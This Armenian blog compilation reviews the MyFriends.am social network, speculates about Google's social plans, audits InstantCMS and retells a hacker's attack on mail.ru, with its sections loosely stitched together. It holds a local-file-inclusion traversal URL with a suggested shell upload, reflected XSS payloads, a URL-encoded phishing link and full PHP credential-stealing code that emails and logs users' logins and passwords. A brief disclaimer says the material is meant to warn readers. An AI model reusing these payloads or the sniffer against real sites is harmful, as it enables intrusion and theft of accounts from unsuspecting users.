Ուրեմն սկսեմ նրանից, որ կայքը կառուցված է BoonEx ընկերության կողմից ստեղծված Dolphin համակարգի վրա, որն ի դեպ ունի մի քանի տարբերակներ` անվճար և լիցենզավորված: Լիցենզավորված տարբերակի ընդմիշտ լիցենզիան արժե 300$: Սա այդքան էլ մեծ գումար չէ, եթե իհարկե ցանց արդարացնի սպասումները: Ինչևէ, MyFriends.am կայքում չտեսա դեպի այդ ընկերություն տանող հետադարձ հղում, որը հուշում է լիցենզիայի գոյության մասին: Ինչու եմ սրա մասին գրում, որովհետև եթե համակարգը լիցենզավորված է, ուրեմն անվտանությունն ինչ-որ չափով ապահովվում է լիցենզավորող կազմակերպությունը: Բայց… MyFriends.am կայքի առաջին էջը, բավականին տարբերվում էր  BoonEx-ի կողմից ցուցադրվող դեմո տարբերակի առաջին էջից: Ասեմ ավելին` դեմո տարբերակի դիզայնը բավականին հաջող էր: Ներկայացնեմ երկու պատկեր, ինքներդ համոզվեք.

Ուշադրություն դարձրեք կարմիր օվալի մեջ առած հատվածները` երկու նկարներում էլ գրված են նույն տառաչափով, բայց հայերենում դրանք գրեթե չեն կարդացվում: Սա առաջին թերությունն է, որ նկատել եմ: Ընդ որում` թերությունը Arian AMU տառատեսակի մեջ է, որը գրված է MyFriends.am կայքի CSS-ում:

Նկարում երևում է նաև, որ BoonEx-ի դեմո տարբերակում վերևի նավիգացիայում բավականին շատ մենյուներ կան, իսկ MyFriends.am-ում դրանք չգիտես ինչու` բացակայում են: Առաջին հայացքից թվում է, թե MyFriends-ը Dolphin-ի անվճար տարբերակի հիման վրա է, որի պատճառով էլ բավականին ֆունկցիաներ պակասում են, կամ գուցե մերոնք չեն օգտվում համկարգի 7-րդ տարբերակից /ինձ թվում է արժե անցնել այս տարբերակին/:

Անցնենք առաջ և գրանցվենք կայքում: Գրանցումը ավելի քան պարզ է, հեշտ և ԱՆՎՃԱՐ: Սրանք շատ կարևոր առավելություններ են ցանցի համար:

Ահա և ցանցի ներսում ենք: Այստեղ կարծես թե ամեն ինչ արդեն հասկանալի է: Գրանցված անդամն իրավունք ունի.

1. Ստանալ և ուղարկել նամակներ,
2. Ընկերանալ մարդկանց հետ,
3. Գնահատել մարդկանց նկարները,
4. Ջերմ ողջունել մեկ հղումով,
5. Ինչ-որ մեկին դարձնել իր համար սիրելի /ֆավորիտ/,
6. Բողոքել ինչ-որ մեկի մասին,
7. Դիտել այլ գրանցված անդամի էլ. փոստը /սա չհասկացա ինչ ֆունկցիա է, բայց կարծես չի աշխատում/,
8. Հրավիրել ուրիշներին այդ կայքում գրանցվելու համար,
9. Տեղադրել նկարներ, տեսանյութեր և մեղեդիներ,
10. Չատով խոսել իր ընկերների հետ,
11. Ստեղծել օրագիր:

Ահա այս ամենը նա կարող է անել անվճար, և կարծես թե` անսահմանափակ քանակությամբ /համենայն դեպս ոչ մի տեղ վճարովի ծառայություն կամ սահմանափակում չտեսա, բացի  վերը նշված 7-րդ կետի ԴԻՏԵԼ ԷԼ.ՓՈՍՏԸ ֆունկցիայից/:

Ընդհանուր առմամբ համակարգը լավն է, բայց ինձ իրավունք վերապահեմ անել մի քանի դիտողություններ մեր MyFriends-ին.

• Խորհուրդ կտամ անցնել Dolphin 7-ին, որովհետև այն ավելի գեղեցիկ է,
• Եթե համակարգի մի մասը web 2.0 է, ապա լավ կլինի ամբողջությամբ անցնել այդ տեխնոլոգիային,
• Նկատի ունենալ ԱՅՍ նկարում նշված թերությունները,
• http://myfriends.am/modules/?r=’ , հղումը վտանգավոր է անվտանգության համար, ուսումնասիրեք r փոփոխականի մուտքային տվյալների ստուգումը,
• Ընդհանրապես հետևել բոլոր մոդուլների աշխատող ֆայլերի մուտքային տվյանլների ստուգումներին, դա շատ կարևոր է:

Մնացած ամեն ինչով համակարգը լավն է:

Հ.Գ. Ափսոս ոչ մի տեղ չգտա գրանցված անդամների քանակի վերաբերյալ ինֆորմացիա:

Շատ կարևոր է մարդկանց մոտ արդեն ձևավորված սովորությունները պահպանել: Այսինքն Me-ն ստիպված պետք է պարունակի Facebook-ի որոշակի շատ կարևոր տարրեր:

Այս ամենին հավելյալ պետք է նորարարություններ շատ լինեն, ու ամենակարևորը` անհրաժեշտ ու հետաքրքիր նորարություններ: Հակառակ դեպքում հենց այդ նորարարությունները կարող են վանել մարդկանց: Հենց այս պատճառով էլ Գուգլը վերջերս գնել է օնլայն խաղերի վճարման համակարգեր ստեղծող Jambool ընկերությունը: Իսկ դրանից առաջ արդեն գնել էր հանհրահայտ Slide և Zynga ընկերությունները, որոնք նախկինում Facebook-ի համար էին խաղեր պատրաստում: Այս ամենը, իհարկե, որոշակի չափով կկոտրի Facebook-ի առաջընթացը, բայց ամենամեծ վնասը, որ կարող է կրել Facebook-ը, որոնողական համակարգերում բարձր տեղերը զիջելն է: Ամենայն հավանականությամբ Me-ի ստեղծումից հետո որոնումների ժամանակ առաջին տեղերում կլինեն Me-ի պրոֆիլները, հետո նոր Facebook-ինը:

Չնայած Գուգլի` Twitter-ի հետ մրցակցության մեջ մտնելու փորձն այդքան էլ չհաջողվեց, այնուամենայնիվ սոցիալական ցանցի դեպքում, իմ կարծիքով Գուգլն ունի բոլոր հնարավարությունները դաշտում մրցակցություն և հետաքրքրություն մտցնելու համար:

Դե ինչ, մեզ մնում է միայն սպասել Me-ին` հույս ունենալով, որ գոնե այնտեղ Быстрое Щелкание-ի նման անիմաստ բաներ չեն լինի:

Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ սկրիպտ), որը կոչվում է InstantCMS: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ է: Փորձեմ այսօր անդրադառնալ այս սկրիպտի թերություններին:

ՆԱԽԱՀԱՐՁԱԿՈՒՄ

Ահա գտել եմ այդ սկրիպտով աշխատող ինչ-որ կայք, որի բախտը ցավոք չի բերել: Հիմա կփորձենք ստուգել…

Առաջինը, որ աչքի ընկավ, Ադմինիստրացիոն բաժնի ակներև տեղադրություն էր` http://badsite.com/admin : Ոնց էլ չլինի, եթե ուրիշ բան չգտնեմ, էտ հաստատ ասելու բանա… Ու քանի գնում ավելի էր ձգում ինձ սկրպիտը…

Գուգլն ինձ ասաց, որ սկրիպտի պաշտոնական սայթը instantcms.ru-ն էր… Ես էլ գնացի ու … 2 Մեգաբիթանոց կապս սկրիպտը շատ արագ տեղավորեց համակարգչիս կոշտ սկավառակի ամենաակնառու տեղը` ուղիղ էկրանիս…ԻՆՁ ԿԱՆԱՉ ՃԱՆԱՊԱՐՀ

Լոկալ սերվերիս վրա միացրեցի apache-ն ու mysql-ը, սկրիպտը տեղավորեցի համապատասխան տեղում ու սկեսեցի փորփրել կոդը: Առաջինը որ տեսա ու աչքերս փայլատակեցին, դա wysiwyg անունով ֆայլերի արկղն էր (այսուհետ` ֆոլդեր), որի մեջ ինձ քաջ ծանոթ FCKeditor-ը աչքով էր անում, ասում էր “Ես այստեղ եմ…Ա~ու…”: Կհարցնեք ինչի էդքան ուրախացա, կասեմ, որ այդ editor-ն ամենալավ օգնականն է, եթե սկրիպտի մեջ լոկալ ինկլուդի թերություն կա: Ավելի մանրամասն.

http://localhost/wysiwyg/editor/filemanager/connectors/test.html

հասցեում գտնվում է ֆայլ-վերբեռնելու էջը, ու չնայած այն բանի, որ .php, .phtml, .cgi և այլ նմանատիպ ֆորմատներով ֆայլեր չենք կարողանա վերբեռնել, բայց եթե LFI-ն կա, ուրեմն ցանկացած ֆորմատի ֆայլ կարող ենք որպես php-կոդ աշխատեցնել: Բայց հակված եմ ավելի շատ ընդունել, որ նման թերությունը ոչ թե տեստավորվող սկրիպտի, այլ հենց FCKeditor-ի թերությունն է:

Ու քանի որ, ամեն ինչ աշխատում էր mod_rewrite-ով, որոշեցի .htaccess-ի մեջ քիթս խոթել մի քիչ ու գտա հետաքրքիր կոդ`

#COMPONENT "RSS FEEDS"
RewriteRule ^rss/([a-z]*)/(.*)/feed.rss$ /components/rssfeed/frontend.php?&target=$1&item_id=$2

SQL-ինյեկցիա գտնելու հույսով գնացինք ուսումնասիրելու frontend.php-ն: Ներկայացնում եմ կոդ, որը ինձ դուր եկավ առաջին հայացքից.

    if (isset($_REQUEST['do'])){ $do = $_REQUEST['do']; } else { $do = 'rss'; }
    if (isset($_REQUEST['target'])){ $target = $_REQUEST['target']; } else { die(); }
    if (isset($_REQUEST['item_id'])) { $item_id = $_REQUEST['item_id']; } else { die(); }
    .................................................. .....................................
    if ($do=='rss'){
    $rss = '';

    if (file_exists($_SERVER['DOCUMENT_ROOT'].'/components/'.$target.'/prss.php')){

    $inCore->includeFile('components/'.$target.'/prss.php');

Ուռա… $target փոփոխականը Local File Inclusion-ի հարվածի տակ ա … աչքիս… երևի…

Եթե PHP-ի կոնֆիգուրացիայի մեջ magic_quotes_gpc = off պայմանը կա, ուրեմն միանշանակ կարող ենք ցանկացաց ֆայլ ինկլուդ անել ահա այսպես`

http://localhost/components/rssfeed/frontend.php?item_id=1 &target=../../../../../../../../../../../../etc/hosts%00

Դե եթե սրա հետ մեկտեղ հիշենք մի քիչ առաջ ասածս, որ FCKeditor-ի  օգնությամբ կարող ենք վերբեռնել ֆայլը, ուրմեն SHELL-ը հաստատ կուղարկվի հոսթինգ (բայց միմիայն ցանկության դեպքում): Դե իսկ, եթե հանկարծ ադմինիստրատորը editor-ի ֆայլ վեռբեռնելու մասը անջատել է, ծայրահեղ դեպքում կոդ-ավատարը կա ու կա:

…………………..

Հոգնեցի… շարունակությունը մի քիչ հետո կգրեմ….

- – - նյութի սկիզբը կարող եք կարդալ այստեղ – - -

[օր երկրորդ...]

Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում`

http://talk.mail.ru/login.html?target=”><script>location.href=’Վերահասցեավորում դեպի ֆիկտիվ ֆորմա’</script>

Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, ու մենք մի քիչ այն դիմակավորեցինք, որպեսզի յուզերները ոչ մի գալիք վտանգ չզգան: Արդյունքում ստացանք ահա սա`

http://talk.mail.ru/login.html?targe…72%69%70%74%3e

Հաջորդ քայլում արդեն գրեցինք մի փոքրիկ սնիֆֆեր, որը ստանում էր իրեն փոխանցված տվյալները, գրում ֆայլի մեջ, իսկ վերջում յուզերին “շպրտում” իր փոստարկղ: Ահա սնիֆֆերիս կոդը`

<?
$adminmail = “mymail@mail.ru”;
function email($to,$mailtext) {
mail($to,’password’,$mailtext,$adminmail);
}
$text=”[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n”;
email($adminmail,$text);
$file = fopen(“logs.txt”,”a”);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo “<FORM id=’auth’ action=’http://talk.mail.ru/login.html’ method=post>
<INPUT value=’$_POST[login]‘>
<INPUT value=’$_POST[pass]‘>
<script>auth.submit();</script>
</FORM>”;
?>

Ուշադրություն դարձրեք, թե ինչպես է յուզերը մտնում իր փոստարկղ (տող 17)`

<script>auth.submit();</script>

Ֆիկտիվ էջի (այսուհետ` ֆեյկ) պատրաստման գործընթացն էդքան էլ դժվար չէ, ֆայլը պահում ենք մեր կոմպի վինչի մեջ, իսկ form տեգի action փոփոխականը ռեդիռեկտ ենք անում: Արդյունքում, յուզերի կողմից մուտքագրված տվյալները գրվում են իմ ֆայլի մեջ, իսկ ինքը կտեղափոխվի փոստարկղ, ու կմտածի, որ DNS-ի խնդիր էր տեղի ունեցել կայքում…

- – - Շարունակելի – - -

Այն ինչ գրում եմ, պարզապես ներկայացնում եմ մի հակերի պատմությունը` իր իսկ նկարագրությամբ: Նյութի մեջ առկա տեղեկատվությունը միտված է ընթերցողներին զգուշացնելուն: Նյութի հետևանքների համար ես ՊԱՏԱՍԽԱՆԱՏՈՒ չեմ… Նյութը հասկանալու համար պետք է գոնե մի քիչ գիտելիքներ ունենաք sql-ինյեկցիաների և XSS հարձակումների մասին:

Հասկանալի՞ է… ուրեմն գնացին: Հիշեցնեմ որ պատմությունը պատմվում է հենց այդ մարդու կողմից, իսկ ես միայն թարգմանում եմ..

[օր առաջին...]

Գիշերվա երկուսն է, ես արդեն պատրաստվում էի քնել, բայց որոշեցի նախքան քնելը ստուգել էլ.փոստս: Մտնելով փոստարկղս  (ես գրանցված եմ մեյլ.ռու-ում), տեսա շատ մեծ քանակությամբ սպամ-նամակներ:  Գրողի տարած անտի-սպամ, աշխատում է գրեթե անարդյունք ու զզվել կարելի է: Իսկ առջևում Նոր Տարի է, և կարծես թե հենց մեյլ.ռու-ն ինձ “սպամ-նվերներ” էր մատուցել: Վերջապես ամոթ ա, արի ես էլ նվեր մատուցեմ “շատ սիրելի” փոստային համակարգիս:

Բայց արի ու տես, որ ինչքան էլ քրքեցի սրանց համակարգը, ոչ մի բաց չգտա: Դե ինչ, էստեղ հույս ունեմ կօգնի շատ սիրելի գուգլը: Դե քանի որ մեյլ.ռու-ն ունի շատ այլ ծառայություններ, գուցե հենց դրանց մեջ բաց տեղեր կան, և ես որոնման հարցումս ձևակերպեցի այսպես`  “site:*mail.ru” :  Ի պատասխան դրան, հարգարժան գուգլն իմ առջև բացեց հղումների 20 էջեր (բախտս բերեց դրանց կեսը կրկնվում էին, այլապես հոգեբուժարանում կլինեի հիմա): Լցրեցի սիրելի մեծ բաժակս սուրճով և սկսեցի ստուգել սերվիսները: Ինչքան էլ  զարմանալի լիներ ինձ համար, բայց մեյլ.ռու-ի վեբ կոդեր-ները լավ էին աշխատել, քանի որ 2 ժամանոց աուդիտից հետո ես ոչ մի բաց չէի գտել նրանց կոդի մեջ: Այդ պահի դրությամբ շտկվել էին որոշ թերություններ 7ya.mail.ru սերվիսի աշխատանքում, նկարները դիտելու ժամանակ բացվում էր popup պատուհան, հիշելով հետևյալ հասցեն`

http://7ya.mail.ru/image.php?in=phot…=500&big_h=375

Ես որոշեցի այն մի քիչ տեսքի բերել և ստացվեց ահա այսպիսի գեղեցկուհի`

http://7ya.mail.ru/image.php?in=”><font color=ORANGE size=10>Russian Net Hunters – Rulezzz</font>

Ինչպես տեսնում ես, ստացվեց – Russian Net Hunters Rulezzz. Դե իսկ մեյլ.ռու-ի վերջին սերվիսներից մեկը  форумы@mail.ru-ն էր: Առաջինը, որ փորձեցի, sql-ինյեկցիան էր, որն իհարկե ոչ մի արդյունք չտվեց, իսկ համակարգն ինձ ռեդիռեկտով դուրս շպրտեց մի էջի վրա, որտեղ գրված էր, որ ես գրանցված չեմ: Բայց այստեղ ուշադրությունս գրավեց շատ հետաքրքիր մի տող`

http://talk.mail.ru/login.html?target=

Փորձեցի ստուգել target փոփոխականը XSS-ի տեսանկյունից և բրաուզերիս մեջ հավաքեցի`

http://talk.mail.ru/login.html?target=”><script>alert();</script>

Շատ զարմացա և ուրախացա երբ իմ առջև դուրս թռավ պատուհան, որը նշանակում էր, որ target փոփոխականը ոչ մի ֆիլտրացիա չի անցնում: Ըհը~… ՈՒրեմն որոշված է, սարքում եմ համակարգ մուտք գործելու ֆիկտիվ էջ, որպեսզի յուզերներն իրենք իրենց ձեռքով ինձ ուղարկեն գաղտնաբառերը: Առավոտվա ժամը 5-ն էր,և նույնիսկ 5 բաժակ սուրճից հետո ահավոր քնել էի ուզում (իսկ ավելի շատ զուգարանի կարիք ունեի): Այդ պատճառով խնդրեցի իմ լավ ընկեր pixcher-ին շարունակել իմ սկսած գործը:

—— Շարունակելի —– Խնդրում եմ գրել կարծիքներ, արժե՞ արդյոք շարունակել “Մի կայքի պատմություն” բաժնի մշակումը…